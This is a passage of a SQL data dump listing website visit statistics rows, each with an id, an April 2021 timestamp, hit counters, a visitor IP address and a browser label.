60.169.22.64','other'),(554109,1619228203,1,1,0,0,'110.36.227.110','other'),(554110,1619228403,1,1,0,0,'112.113.241.207','other'),(554111,1619228503,1,1,0,0,'185.108.213.143','other'),(554112,1619228828,1,1,0,0,'92.39.97.46','other'),(554113,1619228983,1,1,0,0,'66.249.70.47','chrome'),(554114,1619229176,1,1,0,0,'123.16.152.129','msie'),(554115,1619229441,1,1,0,0,'110.37.205.118','other'),(554116,1619230046,1,1,0,0,'211.104.172.54','chrome'),(554117,1619230187,1,1,0,0,'58.49.113.138','chrome'),(554118,1619230640,1,1,0,0,'58.222.223.142','msie'),(554119,1619230867,1,1,0,0,'66.249.70.47','chrome'),(554120,1619231362,1,1,0,0,'110.189.91.117','msie'),(554121,1619231586,1,1,0,0,'200.205.134.107','chrome'),(554122,1619231658,1,1,0,0,'115.79.7.15','other'),(554123,1619231661,1,1,0,0,'27.74.251.75','other'),(554124,1619232485,2,2,0,0,'36.99.136.139','chrome'),(554125,1619232741,1,1,0,0,'79.136.228.139','other'),(554126,1619232760,1,1,0,0,'219.139.148.107','other'),(554127,1619232989,1,1,0,0,'59.28.185.59','other'),(554128,1619233901,1,1,0,0,'138.121.16.103','chrome'),(554129,1619233960,1,1,0,0,'223.197.142.140','other'),(554130,1619233969,1,1,0,0,'171.100.29.14','msie'),(554131,1619234008,1,1,0,0,'60.223.239.134','other'),(554132,1619235947,1,1,0,0,'66.249.70.51','chrome'),(554133,1619236844,1,1,0,0,'124.152.63.5','other'),(554134,1619236868,1,1,0,0,'171.35.163.8','chrome'),(554135,1619236947,1,1,0,0,'220.178.246.43','other'),(554136,1619236999,1,1,0,0,'103.193.191.8','chrome'),(554137,1619237179,1,1,0,0,'5.172.7.55','other'),(554138,1619237211,1,0,1,0,'66.249.70.47',''),(554139,1619237219,1,1,0,0,'66.249.70.49','chrome'),(554140,1619237333,1,1,0,0,'14.187.126.251','other'),(554141,1619237371,1,1,0,0,'14.162.212.108','chrome'),(554142,1619238168,1,1,0,0,'222.82.252.238','chrome'),(554143,1619238270,1,1,0,0,'2.177.33.37','other'),(554144,1619239365,1,1,0,0,'113.194.136.233','other'),(554145,1619239405,1,1,0,0,'122.224.167.154','chrome'),(554146,1619239595,1,1,0,0,'103.65.193.204','msie'),(554147,1619240270,1,1,0,0,'82.162.143.67','other'),(554148,1619240503,1,1,0,0,'181.129.167.82','other'),(554149,1619241206,1,1,0,0,'223.197.142.129','chrome'),(554150,1619241858,1,1,0,0,'221.230.9.33','other'),(554151,1619242076,1,0,1,0,'66.249.70.49',''),(554152,1619242169,1,1,0,0,'220.78.0.19','chrome'),(554153,1619242848,1,1,0,0,'110.78.136.250','other'),(554154,1619242889,1,1,0,0,'81.250.134.101','other'),(554155,1619242962,1,1,0,0,'66.249.70.47','chrome'),(554156,1619243127,1,1,0,0,'222.91.85.239','chrome'),(554157,1619243270,2,2,0,0,'66.249.70.49','chrome'),(554158,1619243534,1,1,0,0,'202.174.181.121','other'),(554159,1619244331,1,1,0,0,'128.199.72.244','chrome'),(554160,1619244401,1,1,0,0,'61.131.203.114','other'),(554161,1619244483,1,1,0,0,'58.20.239.47','firefox'),(554162,1619244621,1,1,0,0,'139.194.217.77','other'),(554163,1619245476,1,1,0,0,'129.205.182.209','msie'),(554164,1619245480,1,1,0,0,'201.63.155.211','msie'),(554165,1619245501,1,1,0,0,'103.233.204.110','msie'),(554166,1619245585,1,1,0,0,'125.34.240.29','msie'),(554167,1619245639,1,1,0,0,'66.220.149.56','chrome'),(554168,1619247499,1,1,0,0,'174.138.80.226','other'),(554169,1619247993,1,1,0,0,'117.192.117.2','msie'),(554170,1619248028,1,1,0,0,'123.22.194.183','msie'),(554171,1619248523,1,1,0,0,'171.103.195.14','other'),(554172,1619248869,1,1,0,0,'110.39.190.6','other'),(554173,1619248935,1,1,0,0,'66.249.70.47','chrome'),(554174,1619249007,1,1,0,0,'112.27.128.211','other'),(554175,1619249178,1,1,0,0,'36.99.136.142','chrome'),(554176,1619250750,1,1,0,0,'222.91.85.239','other'),(554177,1619251168,1,1,0,0,'113.31.108.154','other'),(554178,1619251205,1,1,0,0,'222.252.2.144','chrome'),(554179,1619252119,1,1,0,0,'203.242.141.91','other'),(554180,1619252330,1,1,0,0,'65.201.174.12','other'),(554181,1619252339,1,1,0,0,'1.193.163.158','other'),(554182,1619252361,1,1,0,0,'200.232.15.41','other'),(554183,1619252390,2,2,0,0,'66.249.66.89','chrome'),(554184,1619252588,1,1,0,0,'103.82.67.74','firefox'),(554185,1619252878,1,1,0,0,'113.31.108.154','other'),(554186,1619253449,1,1,0,0,'146.196.122.144','chrome'),(554187,1619253535,1,1,0,0,'82.166.30.32','chrome'),(554188,1619254355,1,1,0,0,'58.242.164.10','msie'),(554189,1619254795,1,1,0,0,'60.6.214.48','chrome'),(554190,1619254895,1,1,0,0,'221.138.38.85','other'),(554191,1619255180,1,1,0,0,'113.31.108.154','other'),(554192,1619255198,1,1,0,0,'113.190.131.85','chrome'),(554193,1619255427,1,1,0,0,'121.15.212.65','msie'),(554194,1619256372,1,0,1,0,'66.249.66.89',''),(554195,1619257431,1,1,0,0,'182.29.29.22','msie'),(554196,1619257453,1,1,0,0,'113.194.140.196','msie'),(554197,1619257554,1,1,0,0,'66.249.66.87','chrome'),(554198,1619257922,2,2,0,0,'36.99.136.131','chrome'),(554199,1619258939,1,1,0,0,'123.183.163.66','msie'),(554200,1619259504,1,1,0,0,'113.172.247.48','other'),(554201,1619260335,1,1,0,0,'66.249.66.87','chrome'),(554202,1619260346,1,1,0,0,'113.31.108.154','other'),(554203,1619261014,1,1,0,0,'124.239.177.91','chrome'),(554204,1619261226,1,1,0,0,'80.89.156.242','chrome'),(554205,1619261288,1,1,0,0,'66.249.66.89','chrome'),(554206,1619261388,1,0,1,0,'66.249.66.87',''),(554207,1619261834,1,1,0,0,'222.253.42.14','firefox'),(554208,1619262022,1,1,0,0,'222.185.243.130','msie'),(554209,1619262576,1,1,0,0,'66.249.66.89','chrome'),(554210,1619262720,1,1,0,0,'113.31.108.154','other'),(554211,1619266388,2,2,0,0,'46.133.97.5','chrome'),(554212,1619268793,1,1,0,0,'66.249.66.89','chrome'),(554213,1619268972,1,1,0,0,'66.249.66.87','chrome'),(554214,1619270012,1,1,0,0,'66.249.66.89','chrome'),(554215,1619274365,1,1,0,0,'31.13.127.27','other'),(554216,1619274366,1,1,0,0,'31.13.115.22','other'),(554217,1619276099,2,2,0,0,'66.249.66.87','chrome'),(554218,1619276910,3,3,0,0,'66.249.66.89','chrome'),(554219,1619278874,1,0,1,0,'66.249.66.89',''),(554220,1619279245,1,1,0,0,'66.249.66.88','chrome'),(554221,1619279259,1,1,0,0,'66.249.66.87','chrome'),(554222,1619282525,1,1,0,0,'31.13.103.8','other'),(554223,1619285037,1,1,0,0,'66.249.66.87','chrome'),(554224,1619285132,1,1,0,0,'66.249.66.88','chrome'),(554225,1619286434,1,0,1,0,'66.249.66.89',''),(554226,1619286567,1,1,0,0,'91.211.251.49','chrome'),(554227,1619286569,1,1,0,0,'35.187.134.54','other'),(554228,1619286570,1,1,0,0,'35.187.134.52','other'),(554229,1619288207,1,1,0,0,'31.41.49.81','chrome'),(554230,1619288558,1,1,0,0,'66.249.66.87','chrome'),(554231,1619288752,1,1,0,0,'66.249.66.89','chrome'),(554232,1619289020,1,1,0,0,'66.249.66.88','chrome'),(554233,1619289165,2,2,0,0,'113.31.108.154','chrome'),(554234,1619289591,1,1,0,0,'66.249.66.87','chrome'),(554235,1619290040,1,1,0,0,'66.249.66.88','chrome'),(554236,1619293270,2,0,2,0,'66.249.66.88',''),(554237,1619293980,4,3,1,0,'66.249.66.87',''),(554238,1619294536,1,1,0,0,'66.249.66.89','chrome'),(554239,1619296017,1,1,0,0,'66.249.66.88','chrome'),(554240,1619296038,1,1,0,0,'66.249.66.87','chrome'),(554241,1619297945,1,0,1,0,'66.249.66.87',''),(554242,1619299856,1,1,0,0,'66.249.66.88','chrome'),(554243,1619301680,1,1,0,0,'113.31.108.154','chrome'),(554244,1619302289,1,1,0,0,'66.249.66.87','chrome'),(554245,1619302423,1,1,0,0,'94.100.220.56','other'),(554246,1619304175,1,1,0,0,'66.249.66.87','chrome'),(554247,1619307183,1,1,0,0,'66.249.66.88','chrome'),(554248,1619308096,1,1,0,0,'66.249.66.89','chrome'),(554249,1619309212,1,1,0,0,'66.249.66.88','chrome'),(554250,1619311733,1,1,0,0,'66.249.66.87','chrome'),(554251,1619318183,1,1,0,0,'66.249.66.87','chrome'),(554252,1619318768,1,1,0,0,'66.249.66.89','chrome'),(554253,1619319671,1,1,0,0,'66.249.66.88','chrome'),(554254,1619323869,2,2,0,0,'66.249.66.88','chrome'),(554255,1619325064,1,1,0,0,'66.249.66.88','chrome'),(554256,1619328473,1,1,0,0,'66.249.66.88','chrome'),(554257,1619331867,1,1,0,0,'66.249.66.87','chrome'),(554258,1619332328,1,1,0,0,'31.13.127.17','other'),(554259,1619333041,1,0,1,0,'66.249.66.89',''),(554260,1619334992,1,1,0,0,'66.249.66.88','chrome'),(554261,1619335642,1,1,0,0,'176.121.5.220','chrome'),(554262,1619335676,1,1,0,0,'31.13.127.14','other'),(554263,1619335677,1,1,0,0,'31.13.127.2','other'),(554264,1619336220,1,1,0,0,'66.249.66.87','chrome'),(554265,1619339450,1,1,0,0,'66.249.66.87','chrome'),(554266,1619339585,1,1,0,0,'66.249.66.88','chrome'),(554267,1619342190,1,1,0,0,'173.252.111.118','other'),(554268,1619342191,1,1,0,0,'173.252.111.1','other'),(554269,1619343337,1,1,0,0,'66.249.66.88','chrome'),(554270,1619347948,1,1,0,0,'66.249.66.89','chrome'),(554271,1619361995,1,1,0,0,'178.128.76.96','firefox'),(554272,1619369605,2,2,0,0,'66.249.66.88','chrome'),(554273,1619370027,1,1,0,0,'66.249.66.89','chrome'),(554274,1619377967,1,0,1,0,'66.249.70.51',''),(554275,1619379767,1,1,0,0,'45.95.28.232','other'),(554276,1619379844,1,1,0,0,'45.132.129.13','chrome'),(554277,1619380420,1,1,0,0,'45.129.79.87','firefox'),(554278,1619380754,1,1,0,0,'45.131.47.227','msie'),(554279,1619380942,1,1,0,0,'45.131.47.227','chrome'),(554280,1619380952,1,1,0,0,'45.95.28.232','firefox'),(554281,1619381341,1,1,0,0,'194.156.104.111','msie'),(554282,1619381994,1,1,0,0,'45.131.47.227','other'),(554283,1619382391,1,1,0,0,'194.156.105.135','chrome'),(554284,1619382485,1,1,0,0,'45.129.79.87','msie'),(554285,1619382555,1,1,0,0,'45.139.52.57','other'),(554286,1619382591,1,1,0,0,'45.139.52.57','chrome'),(554287,1619382984,1,1,0,0,'45.131.47.227','msie'),(554288,1619383136,1,1,0,0,'45.131.47.227','other'),(554289,1619383143,1,1,0,0,'194.156.105.135','other'),(554290,1619383556,1,1,0,0,'2.56.138.226','other'),(554291,1619383918,1,1,0,0,'2.56.138.226','msie'),(554292,1619384012,1,1,0,0,'45.131.47.227','chrome'),(554293,1619384071,1,1,0,0,'45.139.52.57','other'),(554294,1619384138,2,2,0,0,'45.129.79.87','msie'),(554295,1619384180,1,1,0,0,'45.133.31.231','chrome'),(554296,1619384323,1,1,0,0,'194.156.104.111','chrome'),(554297,1619384484,1,1,0,0,'45.95.28.232','other'),(554298,1619384600,2,2,0,0,'45.139.52.57','msie'),(554299,1619384885,1,1,0,0,'194.156.105.135','other'),(554300,1619384914,2,2,0,0,'2.56.138.226','msie'),(554301,1619385223,1,1,0,0,'66.249.70.51','chrome'),(554302,1619385278,1,1,0,0,'194.156.104.111','chrome'),(554303,1619385492,1,1,0,0,'2.56.138.226','other'),(554304,1619385564,1,1,0,0,'45.95.28.232','msie'),(554305,1619385666,1,1,0,0,'45.133.31.231','chrome'),(554306,1619385708,1,1,0,0,'45.133.31.231','msie'),(554307,1619386002,1,1,0,0,'44.242.165.73','chrome'),(554308,1619386627,1,1,0,0,'46.150.244.45','other'),(554309,1619386675,1,1,0,0,'45.132.129.13','chrome'),(554310,1619386769,1,1,0,0,'45.131.47.227','other'),(554311,1619387008,1,1,0,0,'45.132.129.13','msie'),(554312,1619387056,1,1,0,0,'194.156.104.111','chrome'),(554313,1619387228,2,2,0,0,'45.95.28.232','msie'),(554315,1619387429,4,4,0,0,'45.131.47.227','chrome'),(554316,1619387700,2,2,0,0,'45.139.52.57','other'),(554317,1619387779,1,1,0,0,'45.129.79.87','other'),(554318,1619387925,1,1,0,0,'194.156.104.111','msie'),(554319,1619388232,2,2,0,0,'45.133.31.231','chrome'),(554320,1619388575,1,1,0,0,'194.156.105.135','msie'),(554321,1619388579,1,1,0,0,'46.150.244.45','other'),(554322,1619388702,1,1,0,0,'45.129.79.87','firefox'),(554323,1619388782,1,1,0,0,'45.132.129.13','chrome'),(554324,1619388883,1,1,0,0,'45.139.52.57','chrome'),(554325,1619388998,1,1,0,0,'2.56.138.226','other'),(554326,1619389390,3,3,0,0,'45.131.47.227','chrome'),(554327,1619389853,1,1,0,0,'194.156.104.111','chrome'),(554328,1619390012,1,1,0,0,'2.56.138.226','msie'),(554329,1619390241,1,1,0,0,'45.139.52.57','other'),(554330,1619390262,1,1,0,0,'194.156.105.135','msie'),(554331,1619390555,1,1,0,0,'45.133.31.231','other'),(554332,1619390710,1,1,0,0,'45.95.28.232','chrome'),(554333,1619390869,2,2,0,0,'45.139.52.57','chrome'),(554334,1619390972,1,1,0,0,'194.156.104.111','chrome'),(554335,1619391087,1,1,0,0,'45.133.31.231','chrome'),(554336,1619391183,1,1,0,0,'45.129.79.87','other'),(554337,1619391208,3,3,0,0,'45.131.47.227','other'),(554338,1619391301,1,1,0,0,'194.156.105.135','other'),(554339,1619391324,1,1,0,0,'194.156.104.111','other'),(554340,1619391897,1,1,0,0,'45.95.28.232','other'),(554341,1619392004,1,1,0,0,'45.133.31.231','chrome'),(554342,1619392245,1,1,0,0,'45.95.28.232','chrome'),(554343,1619392289,1,1,0,0,'194.156.104.111','other'),(554344,1619392471,1,1,0,0,'194.156.104.111','chrome'),(554345,1619392492,1,1,0,0,'194.156.105.135','other'),(554346,1619392610,1,1,0,0,'45.129.79.87','msie'),(554347,1619392679,1,1,0,0,'45.131.47.227','chrome'),(554348,1619392836,1,1,0,0,'2.56.138.226','msie'),(554349,1619392900,1,1,0,0,'2.56.138.226','firefox'),(554350,1619393370,1,1,0,0,'45.131.47.227','msie'),(554351,1619393592,1,1,0,0,'194.156.104.111','msie'),(554352,1619393810,1,1,0,0,'194.156.105.135','msie'),(554353,1619394087,1,1,0,0,'45.139.52.57','other'),(554354,1619394359,1,1,0,0,'45.133.31.231','other'),(554355,1619394368,1,1,0,0,'2.56.138.226','chrome'),(554356,1619394611,1,1,0,0,'194.156.104.111','msie'),(554357,1619394727,1,1,0,0,'66.249.70.51','chrome'),(554358,1619394762,2,2,0,0,'194.156.105.135','msie'),(554359,1619394791,1,1,0,0,'2.56.138.226','other'),(554360,1619394856,1,1,0,0,'66.249.70.49','chrome'),(554361,1619394906,2,2,0,0,'45.133.31.231','chrome'),(554362,1619395253,1,1,0,0,'46.150.244.45','msie'),(554363,1619395378,1,1,0,0,'46.150.244.45','other'),(554364,1619395564,1,1,0,0,'66.249.70.47','chrome'),(554365,1619395616,2,2,0,0,'45.131.47.227','other'),(554366,1619395664,1,1,0,0,'45.129.79.87','other'),(554367,1619395696,1,1,0,0,'194.156.105.135','other'),(554368,1619396033,1,1,0,0,'45.133.31.231','msie'),(554369,1619396144,1,1,0,0,'194.156.104.111','msie'),(554370,1619396264,1,1,0,0,'45.129.79.87','msie'),(554371,1619396382,1,1,0,0,'45.95.28.232','other'),(554372,1619396569,1,1,0,0,'45.133.31.231','chrome'),(554373,1619396962,1,1,0,0,'45.95.28.232','firefox'),(554374,1619397052,1,1,0,0,'45.139.52.57','other'),(554375,1619397155,1,1,0,0,'194.156.105.135','chrome'),(554376,1619397421,2,2,0,0,'194.156.104.111','chrome'),(554377,1619397559,1,1,0,0,'194.156.104.111','other'),(554379,1619397689,1,1,0,0,'45.131.47.227','other'),(554380,1619397711,1,1,0,0,'45.139.52.57','msie'),(554381,1619397805,1,1,0,0,'45.132.129.13','other'),(554382,1619397956,1,1,0,0,'2.56.138.226','msie'),(554383,1619398283,1,1,0,0,'45.129.79.87','other'),(554384,1619398663,8,8,0,0,'111.221.46.50','chrome'),(554385,1619399543,1,1,0,0,'2.56.138.226','other'),(554386,1619399597,1,1,0,0,'194.156.104.111','firefox'),(554387,1619399685,1,1,0,0,'194.156.105.135','chrome'),(554388,1619400101,1,1,0,0,'173.252.83.17','other'),(554389,1619400245,2,2,0,0,'45.95.28.232','chrome'),(554390,1619400331,1,1,0,0,'66.249.70.47','chrome'),(554391,1619400396,1,1,0,0,'45.139.52.57','msie'),(554392,1619401152,2,2,0,0,'45.95.28.232','other'),(554393,1619401323,1,1,0,0,'45.131.47.227','msie'),(554394,1619402009,2,2,0,0,'45.133.31.231','other'),(554395,1619402124,1,1,0,0,'45.139.52.57','chrome'),(554396,1619402362,1,1,0,0,'45.129.79.87','other'),(554397,1619403523,2,2,0,0,'45.132.129.13','other'),(554398,1619404444,1,1,0,0,'45.133.31.231','other'),(554399,1619404727,1,1,0,0,'2.56.138.226','other'),(554400,1619404746,1,1,0,0,'45.133.31.231','chrome'),(554401,1619404914,1,1,0,0,'45.95.28.232','chrome'),(554402,1619405292,1,1,0,0,'45.95.28.232','firefox'),(554403,1619405314,1,1,0,0,'46.150.244.45','other'),(554404,1619405582,1,1,0,0,'45.95.28.232','msie'),(554405,1619405629,1,1,0,0,'194.156.105.135','other'),(554406,1619405722,1,1,0,0,'45.139.52.57','other'),(554407,1619405856,1,1,0,0,'2.56.138.226','other'),(554408,1619406074,1,1,0,0,'194.156.105.135','firefox'),(554409,1619406075,1,1,0,0,'45.95.28.232','chrome'),(554410,1619406229,2,2,0,0,'45.95.28.232','other'),(554411,1619406748,1,1,0,0,'45.131.47.227','other'),(554412,1619406885,1,1,0,0,'194.156.104.111','msie'),(554413,1619407049,1,1,0,0,'45.131.47.227','chrome'),(554414,1619407102,1,1,0,0,'194.156.105.135','msie'),(554415,1619407207,1,1,0,0,'45.133.31.231','firefox'),(554416,1619407605,2,2,0,0,'45.132.129.13','chrome'),(554417,1619407688,1,1,0,0,'45.95.28.232','firefox'),(554418,1619407721,1,1,0,0,'45.131.47.227','other'),(554419,1619407768,2,2,0,0,'45.133.31.231','chrome'),(554420,1619407813,1,1,0,0,'45.95.28.232','other'),(554421,1619408171,2,2,0,0,'45.95.28.232','chrome'),(554422,1619408635,1,1,0,0,'194.156.105.135','msie'),(554423,1619408834,1,1,0,0,'45.131.47.227','chrome'),(554424,1619408997,1,1,0,0,'45.132.129.13','chrome'),(554425,1619409005,1,1,0,0,'194.156.104.111','chrome'),(554426,1619409745,1,1,0,0,'45.139.52.57','msie'),(554427,1619409919,1,1,0,0,'194.156.105.135','chrome'),(554428,1619410221,1,1,0,0,'45.131.47.227','chrome'),(554429,1619410233,1,1,0,0,'45.133.31.231','msie'),(554430,1619410332,2,2,0,0,'45.139.52.57','other'),(554431,1619410488,1,1,0,0,'45.95.28.232','msie'),(554432,1619410901,1,1,0,0,'194.156.105.135','msie'),(554433,1619410943,1,1,0,0,'45.132.129.13','other'),(554434,1619411038,1,1,0,0,'45.139.52.57','chrome'),(554435,1619411238,1,1,0,0,'45.129.79.87','other'),(554436,1619411278,1,1,0,0,'45.133.31.231','msie'),(554437,1619411374,1,0,1,0,'66.249.70.49',''),(554438,1619411529,1,1,0,0,'45.131.47.227','chrome'),(554439,1619411560,2,2,0,0,'45.95.28.232','chrome'),(554440,1619411729,1,1,0,0,'45.131.47.227','msie'),(554441,1619412316,2,2,0,0,'45.129.79.87','other'),(554442,1619412951,1,1,0,0,'194.156.105.135','chrome'),(554443,1619413070,1,1,0,0,'45.95.28.232','other'),(554444,1619413072,1,1,0,0,'45.139.52.57','other'),(554445,1619413138,3,3,0,0,'45.132.129.13','other'),(554446,1619413444,2,2,0,0,'2.56.138.226','other'),(554447,1619413986,1,1,0,0,'2.56.138.226','msie'),(554448,1619414099,1,1,0,0,'194.156.104.111','msie'),(554449,1619414526,1,1,0,0,'45.132.129.13','chrome'),(554450,1619414576,1,1,0,0,'45.139.52.57','other'),(554451,1619414838,1,1,0,0,'45.129.79.87','other'),(554452,1619415217,1,1,0,0,'45.129.79.87','chrome'),(554453,1619415253,1,1,0,0,'45.131.47.227','chrome'),(554454,1619415425,1,1,0,0,'194.156.105.135','chrome'),(554455,1619415743,2,2,0,0,'45.139.52.57','msie'),(554456,1619416122,2,2,0,0,'45.132.129.13','chrome'),(554457,1619416170,1,1,0,0,'45.133.31.231','chrome'),(554458,1619416241,1,0,1,0,'66.249.70.51',''),(554459,1619416312,1,1,0,0,'2.56.138.226','msie'),(554460,1619416517,1,1,0,0,'45.95.28.232','other'),(554461,1619416674,1,1,0,0,'45.129.79.87','other'),(554462,1619416830,1,1,0,0,'45.95.28.232','chrome'),(554463,1619416855,2,2,0,0,'194.156.105.135','chrome'),(554464,1619416971,1,1,0,0,'45.129.79.87','chrome'),(554465,1619417007,1,1,0,0,'66.249.70.47','chrome'),(554466,1619417718,1,1,0,0,'194.156.105.135','firefox'),(554467,1619417992,1,1,0,0,'194.156.104.111','chrome'),(554468,1619418254,1,1,0,0,'45.129.79.87','chrome'),(554469,1619418378,1,1,0,0,'66.249.70.47','chrome'),(554470,1619418385,1,1,0,0,'45.139.52.57','other'),(554471,1619418536,1,1,0,0,'45.131.47.227','chrome'),(554472,1619418683,1,1,0,0,'194.156.104.111','other'),(554473,1619418829,1,1,0,0,'45.95.28.232','chrome'),(554474,1619419070,2,2,0,0,'45.133.31.231','other'),(554475,1619419340,1,1,0,0,'45.132.129.13','chrome'),(554476,1619420140,1,1,0,0,'2.56.138.226','other'),(554477,1619420247,1,1,0,0,'66.249.70.47','chrome'),(554478,1619420250,1,1,0,0,'2.56.138.226','chrome'),(554479,1619420389,1,1,0,0,'45.95.28.232','other'),(554480,1619420395,1,1,0,0,'45.131.47.227','chrome'),(554481,1619420555,1,1,0,0,'45.131.47.227','other'),(554482,1619420751,1,1,0,0,'194.156.105.135','chrome'),(554483,1619420935,1,1,0,0,'45.131.47.227','firefox'),(554484,1619421540,1,1,0,0,'45.133.31.231','other'),(554485,1619421737,1,1,0,0,'31.13.127.14','other'),(554486,1619422021,1,1,0,0,'45.139.52.57','chrome'),(554487,1619422079,1,1,0,0,'45.95.28.232','other'),(554488,1619422167,1,1,0,0,'66.249.70.49','chrome'),(554489,1619422312,1,1,0,0,'45.133.31.231','chrome'),(554490,1619422313,1,1,0,0,'45.129.79.87','chrome'),(554491,1619422828,1,1,0,0,'45.95.28.232','chrome'),(554492,1619422872,1,1,0,0,'45.131.47.227','other'),(554493,1619422892,1,1,0,0,'45.131.47.227','msie'),(554494,1619422995,1,1,0,0,'45.139.52.57','msie'),(554495,1619423111,1,1,0,0,'45.132.129.13','msie'),(554496,1619423279,1,1,0,0,'2.56.138.226','msie'),(554497,1619423886,1,1,0,0,'45.139.52.57','other'),(554498,1619424028,1,1,0,0,'45.132.129.13','chrome'),(554499,1619424139,1,1,0,0,'45.95.28.232','other'),(554500,1619424258,1,1,0,0,'45.133.31.231','chrome'),(554501,1619424329,1,1,0,0,'194.156.105.135','other'),(554502,1619424341,1,1,0,0,'45.131.47.227','firefox'),(554503,1619424378,1,1,0,0,'2.56.138.226','chrome'),(554504,1619424498,1,1,0,0,'45.131.47.227','msie'),(554505,1619424871,2,2,0,0,'45.133.31.231','other'),(554506,1619425312,1,1,0,0,'45.132.129.13','msie'),(554507,1619425665,2,2,0,0,'45.129.79.87','chrome'),(554508,1619425853,2,2,0,0,'45.131.47.227','chrome'),(554509,1619425977,1,1,0,0,'194.156.105.135','chrome'),(554510,1619426036,1,1,0,0,'173.252.83.23','other'),(554511,1619426238,1,1,0,0,'45.131.47.227','other'),(554512,1619426389,1,1,0,0,'45.129.79.87','other'),(554513,1619426516,1,1,0,0,'45.132.129.13','msie'),(554514,1619426653,1,1,0,0,'45.133.31.231','firefox'),(554515,1619426779,1,1,0,0,'45.133.31.231','other'),(554516,1619426897,1,1,0,0,'194.156.104.111','other'),(554517,1619426972,1,1,0,0,'194.156.104.111','chrome'),(554518,1619427081,1,1,0,0,'45.131.47.227','chrome'),(554519,1619427203,1,1,0,0,'2.56.138.226','other'),(554520,1619427209,1,1,0,0,'194.156.105.135','msie'),(554521,1619428177,1,1,0,0,'45.139.52.57','chrome'),(554522,1619428286,2,2,0,0,'194.156.104.111','chrome'),(554523,1619428353,1,1,0,0,'194.156.104.111','other'),(554524,1619428530,2,2,0,0,'45.95.28.232','other'),(554525,1619428627,1,1,0,0,'66.249.70.51','chrome'),(554526,1619428863,1,1,0,0,'45.129.79.87','chrome'),(554527,1619428871,2,2,0,0,'2.56.138.226','chrome'),(554528,1619428913,1,1,0,0,'45.132.129.13','other'),(554529,1619428939,1,1,0,0,'194.156.105.135','chrome'),(554530,1619429231,1,1,0,0,'194.156.105.135','other'),(554531,1619429285,2,2,0,0,'45.131.47.227','other'),(554532,1619429727,1,1,0,0,'45.129.79.87','other'),(554533,1619430052,1,1,0,0,'45.132.129.13','chrome'),(554534,1619430341,1,1,0,0,'45.129.79.87','firefox'),(554535,1619430398,1,1,0,0,'45.133.31.231','msie'),(554536,1619431182,2,2,0,0,'2.56.138.226','msie'),(554537,1619431292,1,1,0,0,'45.95.28.232','other'),(554538,1619431792,1,1,0,0,'45.129.79.87','firefox'),(554539,1619431933,1,1,0,0,'31.13.103.15','other'),(554540,1619432251,1,1,0,0,'45.132.129.13','other'),(554541,1619432640,1,1,0,0,'194.156.105.135','chrome'),(554542,1619432762,1,1,0,0,'2.56.138.226','msie'),(554543,1619432880,1,1,0,0,'45.129.79.87','other'),(554544,1619432891,1,1,0,0,'45.139.52.57','chrome'),(554545,1619432968,1,1,0,0,'45.131.47.227','chrome'),(554546,1619432969,1,1,0,0,'45.133.31.231','other'),(554547,1619432982,1,1,0,0,'66.249.70.49','chrome'),(554548,1619433010,1,1,0,0,'45.95.28.232','other'),(554549,1619433339,1,1,0,0,'2.56.138.226','other'),(554550,1619433438,1,1,0,0,'45.132.129.13','chrome'),(554551,1619433689,1,1,0,0,'45.129.79.87','chrome'),(554552,1619433934,1,1,0,0,'45.139.52.57','msie'),(554553,1619434008,1,1,0,0,'45.132.129.13','msie'),(554554,1619434172,1,1,0,0,'45.132.129.13','other'),(554555,1619434203,2,2,0,0,'45.133.31.231','other'),(554556,1619434222,1,1,0,0,'194.156.104.111','other'),(554557,1619434367,1,1,0,0,'45.139.52.57','other'),(554558,1619434404,2,2,0,0,'45.129.79.87','other'),(554559,1619434594,1,1,0,0,'45.139.52.57','chrome'),(554560,1619435747,1,1,0,0,'45.132.129.13','chrome'),(554561,1619436101,1,1,0,0,'45.139.52.57','chrome'),(554562,1619436268,1,1,0,0,'45.131.47.227','chrome'),(554564,1619436269,1,1,0,0,'45.129.79.87','msie'),(554565,1619436377,1,1,0,0,'45.133.31.231','msie'),(554566,1619436579,1,1,0,0,'2.56.138.226','msie'),(554567,1619437100,1,1,0,0,'2.56.138.226','other'),(554568,1619437127,1,1,0,0,'45.133.31.231','chrome'),(554569,1619437464,1,1,0,0,'45.132.129.13','msie'),(554570,1619437554,1,1,0,0,'194.156.104.111','msie'),(554571,1619437625,1,1,0,0,'45.132.129.13','chrome'),(554572,1619437645,2,2,0,0,'194.156.105.135','chrome'),(554573,1619437882,1,1,0,0,'45.139.52.57','msie'),(554574,1619438029,1,1,0,0,'45.133.31.231','chrome'),(554575,1619438083,1,1,0,0,'45.129.79.87','chrome'),(554576,1619438202,1,1,0,0,'45.133.31.231','msie'),(554577,1619438449,1,1,0,0,'45.95.28.232','msie'),(554578,1619438453,1,1,0,0,'45.132.129.13','other'),(554579,1619438979,1,1,0,0,'45.139.52.57','other'),(554580,1619438987,1,1,0,0,'66.249.70.47','chrome'),(554581,1619439174,1,1,0,0,'45.132.129.13','chrome'),(554582,1619439958,1,1,0,0,'45.139.52.57','other'),(554583,1619440541,1,1,0,0,'45.132.129.13','other'),(554584,1619440648,1,1,0,0,'45.139.52.57','firefox'),(554585,1619440726,1,1,0,0,'45.132.129.13','chrome'),(554586,1619441015,1,1,0,0,'45.129.79.87','msie'),(554587,1619441421,2,0,2,0,'66.249.70.51',''),(554588,1619441508,1,1,0,0,'45.131.47.227','chrome'),(554589,1619442030,2,2,0,0,'194.156.104.111','msie'),(554590,1619442116,1,1,0,0,'194.156.105.135','msie'),(554591,1619442830,1,1,0,0,'45.131.47.227','msie'),(554592,1619442850,1,1,0,0,'45.129.79.87','chrome'),(554593,1619442900,1,1,0,0,'45.95.28.232','chrome'),(554594,1619443152,1,1,0,0,'45.131.47.227','other'),(554595,1619443381,1,1,0,0,'45.132.129.13','chrome'),(554596,1619443898,1,1,0,0,'45.95.28.232','other'),(554597,1619444187,1,1,0,0,'194.156.105.135','chrome'),(554598,1619444626,2,2,0,0,'45.133.31.231','other'),(554599,1619444773,1,1,0,0,'45.139.52.57','msie'),(554600,1619445141,1,1,0,0,'2.56.138.226','chrome'),(554601,1619445146,2,2,0,0,'45.129.79.87','chrome'),(554602,1619445152,2,2,0,0,'194.156.105.135','msie'),(554603,1619445612,1,1,0,0,'45.131.47.227','other'),(554604,1619446554,2,2,0,0,'45.132.129.13','msie'),(554605,1619446765,2,2,0,0,'45.95.28.232','chrome'),(554606,1619446770,1,1,0,0,'45.129.79.87','other'),(554607,1619446800,2,2,0,0,'194.156.105.135','other'),(554608,1619447119,1,1,0,0,'45.131.47.227','firefox'),(554609,1619447203,1,1,0,0,'45.132.129.13','chrome'),(554610,1619447333,2,2,0,0,'45